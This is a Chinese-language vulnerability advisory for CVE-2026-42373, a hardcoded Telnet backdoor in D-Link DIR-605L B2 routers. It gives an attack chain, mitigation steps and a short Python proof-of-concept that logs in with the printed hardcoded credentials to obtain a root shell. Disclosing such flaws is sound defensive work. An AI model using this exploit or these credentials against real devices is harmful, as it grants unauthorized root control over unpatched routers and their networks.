IPBUF安全漏洞报告
English
CVE-2026-42373 CVSS 9.8 严重

CVE-2026-42373 D-Link DIR-605L硬编码后门漏洞

披露日期: 2026-05-04
来源: 33c584b5-0579-4c06-b2a0-8d8329fcab9c

漏洞信息

漏洞编号
CVE-2026-42373
漏洞类型
硬编码凭证
CVSS评分
9.8 严重
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
D-Link DIR-605L

相关标签

Hardcoded CredentialsBackdoorIoTD-LinkRCETelnet

漏洞概述

D-Link DIR-605L B2版本存在硬编码Telnet后门漏洞。设备启动时自动开启Telnet服务,使用固定的用户名和密码。攻击者无需认证即可通过本地网络获取Root权限完全控制设备。鉴于该设备已停止生命周期(EOL),官方将不会发布任何安全补丁,用户面临极高的安全风险。

技术细节

该漏洞源于D-Link DIR-605L (Hardware Revision B2) 固件中包含的硬编码凭证。设备在启动过程中会执行 /bin/telnetd.sh 脚本,该脚本启动了一个自定义的Telnet守护进程。该守护进程通过 -u 参数指定了硬编码的用户名和密码。具体而言,用户名被硬编码为 "Alphanetworks",密码 "wrgn76_dlwbr_dir605L" 则从设备的 /etc/alpha_config/image_sign 配置文件中读取。系统使用自定义的 login 二进制文件,并通过 strcmp() 函数比对输入的凭证与硬编码值。由于这些凭证是静态的且无法通过常规Web界面更改,任何连接到本地网络的攻击者都可以利用这些凭证登录Telnet服务,从而获得设备的Root Shell,进而完全控制路由器,执行任意命令或窃取信息。

攻击链分析

STEP 1
网络扫描
攻击者在目标网络中扫描端口23开放的主机,识别D-Link DIR-605L设备。
STEP 2
建立连接
攻击者针对目标设备发起Telnet连接。
STEP 3
凭证认证
利用硬编码的用户名'Alphanetworks'和密码'wrgn76_dlwbr_dir605L'进行登录。
STEP 4
获取权限
通过认证后,获取设备的Root Shell,获得完全控制权。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import telnetlib import sys # Target IP address of the vulnerable device HOST = '192.168.0.1' PORT = 23 # Hardcoded credentials extracted from firmware USER = 'Alphanetworks' PASS = 'wrgn76_dlwbr_dir605L' def exploit(): try: # Establish Telnet connection tn = telnetlib.Telnet(HOST, PORT, timeout=10) # Wait for login prompt tn.read_until(b"login: ", timeout=5) tn.write(USER.encode('ascii') + b"\n") # Wait for password prompt tn.read_until(b"Password: ", timeout=5) tn.write(PASS.encode('ascii') + b"\n") # If successful, we have a root shell print("[+] Exploit successful! Root shell access granted.") print(tn.read_all().decode('ascii')) tn.close() except Exception as e: print(f"[-] Exploit failed: {e}") if __name__ == "__main__": exploit()

影响范围

D-Link DIR-605L Hardware Revision B2

防御指南

临时缓解措施
由于该设备已停止生命周期(EOL),厂商不会发布固件更新来修复此漏洞。唯一的彻底解决方案是更换设备。在更换前,请确保路由器不直接暴露在公网,并在内部网络防火墙上阻断Telnet(TCP 23)流量。此外,更改局域网默认子网可降低被自动化扫描脚本发现的风险。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表